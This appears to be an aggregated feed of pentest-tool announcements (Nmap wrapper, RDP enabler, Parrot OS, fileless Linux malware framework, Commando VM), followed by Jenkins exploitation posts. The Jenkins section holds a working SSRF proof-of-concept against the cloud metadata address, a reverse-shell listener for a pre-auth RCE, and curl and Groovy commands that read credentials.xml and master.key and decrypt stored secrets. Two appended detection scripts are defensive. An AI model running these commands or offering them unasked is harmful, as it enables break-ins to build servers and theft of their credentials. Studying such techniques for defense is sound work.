Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start an Nmap scan and, above all, to collect the results into a well-organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.

Details

Trigmap can perform several tasks using the Nmap Scripting Engine (NSE):

- Port Scan
- Service and Version Detection
- Web Resources Enumeration
- Vulnerability Assessment
- Common Vulnerabilities Test
- Common Exploits Test
- Dictionary Attacks Against Active Services
- Default Credentials Test

Usage

Trigmap can be used in two ways:

Interactive mode: trigmap [ENTER], and the script does the rest.

NON-interactive mode:

    trigmap -h|--host [-tp|--tcp TCP ports] [-up|--udp UDP ports] [-f|--file file path] [-s|--speed time profile] [-n|--nic NIC] [-p|--phase phases]

If you want to see the help: trigmap --help prints this helper.

For more screenshots see the relative directory of the repository.

Dir Hierarchy

Customization

It is possible to customize the script by changing the value of the variables at the beginning of the file. In particular you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).

    ################################################
    # PARAMETERS
    ################################################
    GENERAL_USER_LIST='general_user_wordlist_short.txt'
    WIN_USER_LIST='win_user_wordlist_short.txt'
    UNIX_USER_LIST='unix_user_wordlist_short.txt'
    SHORT_PASS_LIST='fasttrack.txt'
    LONG_PASS_LIST='rockyou.txt'

    ################################################
    # NMAP SETTING
    ################################################
    # PE (echo req), PP (timestamp-request)
    # you can add a port on every ping scan
    NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'
    NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'
    SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'
    SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'
    SCRIPT_ARGS="userdb=$GENERAL_USER_LIST,passdb=$SHORT_PASS_LIST"
    CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN

Twin Brother

This project is very similar to Kaboom, but it has a different philosophy; in fact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is its portability and efficiency, but it is recommended to use both tools to scan the targets, so as to gather more evidence with different tools (redundancy and reliability).

Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.

The tool only works if WinRM is enabled. Since Windows Server 2012, WinRM is enabled by default on all Windows server operating systems, but not on client operating systems.

Note: Remote Desktop is disabled by default on all Windows operating systems. The user would require the local administrator password or administrator privileges on the server to enable RDP on a targeted machine.

Screenshots

Targeted machine on an internal network has RDP disabled:

Enabling the Remote Desktop service on a targeted machine by pressing option 2:

Successfully enabled the Remote Desktop service on a targeted machine:

How to install?

- git clone https://github.com/Viralmaniar/PeekABoo.git
- cd PeekABoo
- python peekaboo.py

How do I use this?

Press 1: This will set the PowerShell execution policy to unrestricted mode.
Press 2: It enables Remote Desktop on the targeted machine and shows the RDP port (3389) status.
Press 3: It disables Remote Desktop on the targeted machine.
Press 4: To exit from the program.

My Windows machine does not have Python installed, what should I do?

Download an exe from the release section of the GitHub repository along with the PowerShell files available there, or build it on your own using PyInstaller after reviewing the source code. Compile peekaboo.py into an executable using PyInstaller; PyInstaller is available on PyPI and can be installed through pip: pip install pyinstaller

Questions?

Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Download PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Parrot Security 4.6 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

After 3 months of heavy development Parrot 4.6 is officially released.

How to update

Update your existing Parrot system with the following command:

    sudo parrot-upgrade

System Changes (Appearance)

The desktop-base and parrot-wallpapers packages also received some love and are updated to reflect such changes, including the new Parrot appearance.

APT now enforces https

Parrot 4.6 is now configured to serve signed index files via https by default, and the mirror redirector is configured to redirect traffic to https mirrors when available. In case an https mirror is not available, the packages are downloaded from fallback http mirrors, but APT will still verify the signatures.

In other Debian-based systems and previous Parrot OS versions, mirrors used http by default, and https was just an exception. Http downloads don't represent a security risk because gpg signatures are more effective than ssl downloads in certifying repository integrity, as described on this website: https://whydoesaptnotusehttps.com/.

Although you can never eliminate the risk of bad actors, we hope to increase the cost for providers attempting to intercept or track user activities (i.e. knowing if a user is installing specific software).

Improved drivers support

Parrot 4.6 includes the Linux 4.19 kernel, which contains several security patches, performance improvements and better hardware support.

Moreover, Parrot 4.6 features important updates for Broadcom and other wireless chipset manufacturers, and the Nvidia drivers were updated to the latest 410 version with better Quadro support. Debian Kernel Changelog – Linux changelog

Anonsurf has OpenNIC support

Anonsurf now integrates a new option to switch from the system DNS servers to OpenNIC DNS resolvers.

OpenNIC is a community-driven DNS resolver provider that respects user freedom and allows domain resolution of some special top level domains.

Download Parrot Security 4.6

Link: http://feedproxy.google.com/~r/PentestTools/~3/s2FArN4t_3o/parrot-security-46-security-gnulinux.html

Reverie – Automated Pentest Tools Designed For Parrot Linux

Automated Pentest Tools Designed For Parrot Linux. This tool will make your basic pentesting tasks, like Information Gathering, Security Auditing and Reporting, fully automatic.

Usage Guide

Download / Clone

    ~# git clone https://github.com/baguswiratmaadi/reverie

Go inside the reverie dir

    ~# cd reverie

Give permission to reverie

    ~# chmod 777 *.sh

Run reverie without installing

    ~# ./reverie.sh

If you want to install reverie

    ~# ./install.sh

Changelog

1.0 First Release
1.1 Fixing Error In Nikto Command Line

Pentest Tools Auto Executed With Reverie

- Whois Lookup
- DNSwalk
- Nmap
- Dmitry
- Whatweb
- wafw00f
- Load Balancing Detector
- SSLyze
- TLSSled
- Automater
- Nikto
- And More Tools Soon

Screenshot

This is a preview of Reverie Auto Pentest
Tools Preview
Output Result
Report In HTML

Disclaimer

Do not scan government and private IT objects without legal permission. Do at your own risk.

Download Reverie

Link: http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html

fireELF – Fileless Linux Malware Framework

fireELF is an open-source fileless Linux malware framework that is cross-platform and allows users to easily create and manage payloads. By default it comes with 'memfd_create', which is a new way to run Linux ELF executables completely from memory, without having the binary touch the hard drive.

Features

- Choose and build payloads.
- Ability to minify payloads.
- Ability to shorten payloads by uploading the payload source to a pastebin; it then creates a very small stager compatible with python <= 2.7 which allows for easy deployment.
- Output created payload to file.
- Ability to create payload from either a url or a local binary.

Included payload memfd_create

The only included payload, 'memfd_create', is based on the research of Stuart. This payload creates an anonymous file descriptor in memory and then uses fexecve to execute the binary directly from the file descriptor. This allows for execution completely in memory, which means that if the Linux system gets restarted, the payload will be nowhere to be found.

Creating a Payload

By default fireELF comes with 'memfd_create', but users can develop their own payloads. By default the payloads are stored in payloads/, and in order to create a valid payload you simply need to include a dictionary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictionary is below:

    desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}

In addition to the 'desc' dictionary, the entry point used by the plugin engine I built requires a main function, which will automatically get passed two parameters: the first is a boolean that, if true, means it is getting passed a url; the second parameter is the data. An example of a simple entry point is below:

    def main(is_url, url_or_payload):
        return

If you have a method feel free to commit a payload!

Screenshots

Installation

Download the dependencies by running:

    pip3 install -U -r dep.txt

fireELF is developed in Python 3.x.x

Usage

    usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME] (-u PAYLOAD_URL | -e EXECUTABLE_PATH)

    fireELF, Linux Fileless Malware Generator

    optional arguments:
      -h, --help           show this help message and exit
      -s                   Supress Banner
      -p PAYLOAD_NAME      Name of Payload to Use
      -w PAYLOAD_FILENAME  Name of File to Write Payload to (Highly Recommended if You're not Using the Paste Site Option)
      -u PAYLOAD_URL       Url of Payload to be Executed
      -e EXECUTABLE_PATH   Location of Executable

Download fireELF
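The memfd_create technique described above leaves a well-known artifact on the defender's side: the /proc/<pid>/exe link of a process started via fexecve on an anonymous memfd points at a path of the form /memfd:<name> (deleted) rather than a file on disk. The following is an added example (not part of fireELF) that classifies such link targets and walks /proc to report memfd-backed and unlinked executables; the sample link targets are constructed.

```python
"""Detect processes executing from a memfd-backed anonymous file.

Added example, not code from fireELF. On Linux, /proc/<pid>/exe for a binary
run from a memfd resolves to '/memfd:<name> (deleted)'; a binary unlinked
after start resolves to '<path> (deleted)'.  Both deserve triage, the former
far more than the latter (which also happens after in-place package upgrades).
"""
import os
import re
from typing import Dict, List, Optional

# exe link target of a memfd-backed process; the name may be empty.
MEMFD_EXE_RE = re.compile(r"^/memfd:(?P<name>.*?) \(deleted\)$")


def memfd_name(exe_target: str) -> Optional[str]:
    """Return the memfd name if exe_target denotes a memfd-backed executable, else None."""
    m = MEMFD_EXE_RE.match(exe_target)
    return m.group("name") if m else None


def classify_exe(exe_target: str) -> str:
    """'memfd' for memfd-backed, 'deleted' for an unlinked on-disk binary, 'disk' otherwise."""
    if memfd_name(exe_target) is not None:
        return "memfd"
    if exe_target.endswith(" (deleted)"):
        return "deleted"
    return "disk"


def scan_proc(proc_root: str = "/proc") -> List[Dict[str, str]]:
    """Walk proc_root and return processes whose exe is not a regular on-disk file."""
    findings: List[Dict[str, str]] = []
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return findings  # not Linux, or proc_root missing
    for entry in entries:
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, process already gone, or insufficient privileges
        kind = classify_exe(target)
        if kind != "disk":
            findings.append({"pid": entry, "exe": target, "kind": kind})
    return findings


# Constructed sample link targets (not captured from a real host).
SAMPLE_LINKS = {
    "1234": "/memfd:payload (deleted)",
    "1235": "/usr/bin/python3",
    "1236": "/tmp/dropper (deleted)",
}


def classify_samples(links: Dict[str, str]) -> Dict[str, str]:
    """Classify a pid -> exe-link mapping such as SAMPLE_LINKS."""
    return {pid: classify_exe(target) for pid, target in links.items()}


if __name__ == "__main__":
    for pid, kind in classify_samples(SAMPLE_LINKS).items():
        print(pid, kind)
    for finding in scan_proc():  # live scan; needs root to read other users' exe links
        print(finding)
```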

Link: http://feedproxy.google.com/~r/PentestTools/~3/nkiWxHsqM50/fireelf-fileless-linux-malware-framework.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements

- Windows 7 Service Pack 1 or Windows 10
- 60 GB Hard Drive
- 2 GB RAM

Instructions

- Create and configure a new Windows Virtual Machine
- Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
- Take a snapshot of your machine!
- Download and copy install.ps1 onto your newly configured machine.
- Open PowerShell as an Administrator
- Enable script execution by running the following command:

    Set-ExecutionPolicy Unrestricted

- Finally, execute the installer script as follows:

    .\install.ps1

You can also pass your password as an argument: .\install.ps1 -password

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package

Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy GitHub Desktop on your system:

    cinst github

Staying up to date

Type the following command to update all of the packages to the most recent version:

    cup all

Installed Tools

Active Directory Tools
- Remote Server Administration Tools (RSAT)
- SQL Server Command Line Utilities
- Sysinternals

Command & Control
- Covenant
- PoshC2
- WMImplant
- WMIOps

Developer Tools
- Dep
- Git
- Go
- Java
- Python 2
- Python 3 (default)
- Visual Studio 2017 Build Tools (Windows 10)
- Visual Studio Code

Evasion
- CheckPlease
- Demiguise
- DotNetToJScript
- Invoke-CradleCrafter
- Invoke-DOSfuscation
- Invoke-Obfuscation
- Invoke-Phant0m
- Not PowerShell (nps)
- PS>Attack
- PSAmsi
- Pafishmacro
- PowerLessShell
- PowerShdll
- StarFighters

Exploitation
- ADAPE-Script
- API Monitor
- CrackMapExec
- CrackMapExecWin
- DAMP
- Exchange-AD-Privesc
- FuzzySec's PowerShell-Suite
- FuzzySec's Sharp-Suite
- Generate-Macro
- GhostPack
  - Rubeus
  - SafetyKatz
  - Seatbelt
  - SharpDPAPI
  - SharpDump
  - SharpRoast
  - SharpUp
  - SharpWMI
- GoFetch
- Impacket
- Invoke-ACLPwn
- Invoke-DCOM
- Invoke-PSImage
- Invoke-PowerThIEf
- Kali Binaries for Windows
- LuckyStrike
- MetaTwin
- Metasploit
- Mr. Unikod3r's RedTeamPowershellScripts
- NetshHelperBeacon
- Nishang
- Orca
- PSReflect
- PowerLurk
- PowerPriv
- PowerSploit
- PowerUpSQL
- PrivExchange
- Ruler
- SharpExchangePriv
- SpoolSample
- UACME
- impacket-examples-windows
- vssown

Information Gathering
- ADACLScanner
- ADExplorer
- ADOffline
- ADRecon
- BloodHound
- Get-ReconInfo
- GoWitness
- Nmap
- PowerView
  - Dev branch included
- SharpHound
- SharpView
- SpoolerScanner

Networking Tools
- Citrix Receiver
- OpenVPN
- Proxycap
- PuTTY
- Telnet
- VMWare Horizon Client
- VMWare vSphere Client
- VNC-Viewer
- WinSCP
- Windump
- Wireshark

Password Attacks
- ASREPRoast
- CredNinja
- DSInternals
- Get-LAPSPasswords
- Hashcat
- Internal-Monologue
- Inveigh
- Invoke-TheHash
- KeeFarce
- KeeThief
- LAPSToolkit
- MailSniper
- Mimikatz
- Mimikittenz
- RiskySPN
- SessionGopher

Reverse Engineering
- DNSpy
- Flare-Floss
- ILSpy
- PEview
- Windbg
- x64dbg

Utilities
- 7zip
- Adobe Reader
- AutoIT
- Cmder
- CyberChef
- Gimp
- Greenshot
- Hashcheck
- Hexchat
- HxD
- Keepass
- MobaXterm
- Mozilla Thunderbird
- Neo4j Community Edition
- Pidgin
- Process Hacker 2
- SQLite DB Browser
- Screentogif
- Shellcode Launcher
- Sublime Text 3
- TortoiseSVN
- VLC Media Player
- Winrar
- yEd Graph Tool

Vulnerability Analysis
- Egress-Assess
- Grouper2
- zBang

Web Applications
- Burp Suite
- Fiddler
- Firefox
- OWASP Zap

Wordlists
- FuzzDB
- PayloadsAllTheThings
- SecLists

Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

Jenkins – CVE-2018-1000600 PoC

Second exploit from the blog post https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF
https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915

This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new Jenkins instance it pulls all the updated plugins (also by default). I'm honestly not sure how often people set update to latest plugin on by default, but it does seem to knock down some of this stuff.

Exploit works against: GitHub Plugin up to and including 1.29.1

When I installed Jenkins today (25 Feb 19) it installed 1.29.4 by default, thus the below does NOT work.

From the blog post:

CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials

It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this? (Or if someone knows how to obtain credentials ID, please tell me!)

Although it can't extract any credentials without known credentials ID, there is still another attack primitive – a fully-responded SSRF! We all know how hard it is to exploit a Blind SSRF, so that's why a fully-responded SSRF is so valuable!

PoC:

    http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://169.254.169.254/%23&login=orange&password=tsai

To get old versions of the plugin and info you can go to https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin

Download old versions:
https://updates.jenkins.io/download/plugins/github-branch-source/
https://updates.jenkins.io/download/plugins/github/

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html

Jenkins – messing with exploits pt3 – CVE-2019-1003000

References:
https://www.exploit-db.com/exploits/46453
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

This post covers the Orange Tsai Jenkins pre-auth exploit.

Vulnerable versions:
- Jenkins < 2.137 (preauth)
- Pipeline: Declarative Plugin up to and including 1.3.4
- Pipeline: Groovy Plugin up to and including 2.61
- Script Security Plugin up to and including 1.49 (in CG's testing 1.50 is also vuln)

The exploitdb link above lists a nice self-contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.

    nc -l 8888 -vv
    whoami
    bash: no job control in this shell
    bash-3.2$ jenkins

After Jenkins 2.138 the preauth is gone, but if you have an overall read token and the plugins are still vulnerable you can still exploit that server. You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html

Jenkins – Identify IP Addresses of nodes

While doing some research I found several posts on Stack Overflow asking how to identify the IP address of nodes. You might want to know this if you read the decrypting credentials post and managed to get yourself some ssh keys for nodes but you can't actually see the node's IP in the Jenkins UI.

Stack Overflow link: https://stackoverflow.com/questions/14930329/finding-ip-of-a-jenkins-node
Blog on setting up a node: https://embeddedartistry.com/blog/2017/12/22/jenkins-configuring-a-linux-slave-node

There are great answers in the Stack Overflow post on using the script console, but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.

You can just browse to jenkins-ip/computer/$nodename/config.xml. This request will require the extended read permission.

Optionally, if you are on the box or have a backup, you can go to jenkins-dir/nodes/$nodename/config.xml

Link: http://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:

    hashed_pw = '$PASSWORDHASH'
    passwd = hudson.util.Secret.decrypt(hashed_pw)
    println(passwd)

You need to perform this on the Jenkins system itself, as it uses the local master.key and hudson.util.Secret. Screenshot below.

Code to get the credentials.xml from the script console

Windows:

    def sout = new StringBuffer(), serr = new StringBuffer()
    def proc = 'cmd.exe /c type credentials.xml'.execute()
    proc.consumeProcessOutput(sout, serr)
    proc.waitForOrKill(1000)
    println "out> $sout err> $serr"

*nix:

    def sout = new StringBuffer(), serr = new StringBuffer()
    def proc = 'cat credentials.xml'.execute()
    proc.consumeProcessOutput(sout, serr)
    proc.waitForOrKill(1000)
    println "out> $sout err> $serr"

If you just want to do it with curl you can hit the scriptText endpoint and do something like this:

Windows:

    curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Also, because this syntax took me a minute to figure out, for files in subdirectories:

    curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

*nix:

    curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"

Then to decrypt any passwords:

    curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"

If you are in a position where you have the files but no access to Jenkins you can use:
https://github.com/tweksteen/jenkins-decrypt

There is a small bug in the python when it does the regex and I haven't bothered to fix it at the time of this post. But here is a version where, instead of the regex, I'm just printing out the values and you can see the decrypted password. The change is line 55.
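Both the script console requests above and the createTokenByPassword SSRF PoC from the CVE-2018-1000600 post leave distinctive entries in the Jenkins access log. The following is an added example (not code from these posts or from Jenkins) that runs a small detector over constructed NCSA combined-format log lines and flags POSTs to the script console endpoints and GitHub token-creator requests whose apiUrl points at an internal or metadata address; the log lines and IPs are constructed.

```python
"""Flag Jenkins access-log entries matching the request shapes discussed above.

Added example, not from the posts or from Jenkins. Lines are assumed to be in
NCSA combined format (an assumption about how the access logger is configured);
the sample lines are constructed, not captured from a real server.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SCRIPT_CONSOLE_PATHS = ("/script", "/scriptText")
TOKEN_CREATOR_MARK = "GitHubTokenCredentialsCreator/createTokenByPassword"


def is_internal_or_metadata(host: str) -> bool:
    """True for the cloud metadata address, loopback, or RFC 1918 targets."""
    if host == "169.254.169.254" or host == "localhost" or host.startswith("127."):
        return True
    return bool(re.match(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)", host))


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(req: Dict[str, str]) -> Optional[str]:
    """Return an alert label for a parsed request, or None if unremarkable."""
    parts = urlsplit(req["path"])
    if TOKEN_CREATOR_MARK in parts.path:
        api_url = parse_qs(parts.query).get("apiUrl", [""])[0]
        target = urlsplit(api_url).hostname or ""
        # The PoC aims apiUrl at an internal host; an unauthenticated hit is notable on its own.
        if is_internal_or_metadata(target) or req["user"] == "-":
            return "ssrf-probe:createTokenByPassword"
    if parts.path in SCRIPT_CONSOLE_PATHS and req["method"] == "POST":
        return "script-console:" + parts.path
    return None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        label = classify(req)
        if label:
            alerts.append({"ip": req["ip"], "user": req["user"], "label": label})
    return alerts


# Constructed sample log lines (the PoC URL is the one shown in the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Feb/2019:10:00:01 +0000] "GET /securityRealm/user/admin/descriptorByName/'
    'org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword'
    '?apiUrl=http://169.254.169.254/%23&login=orange&password=tsai HTTP/1.1" 200 512',
    '10.0.0.7 - admin [25/Feb/2019:10:02:15 +0000] "POST /scriptText HTTP/1.1" 200 88',
    '10.0.0.9 - alice [25/Feb/2019:10:03:00 +0000] "GET /job/build/lastBuild/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```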

Link: http://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html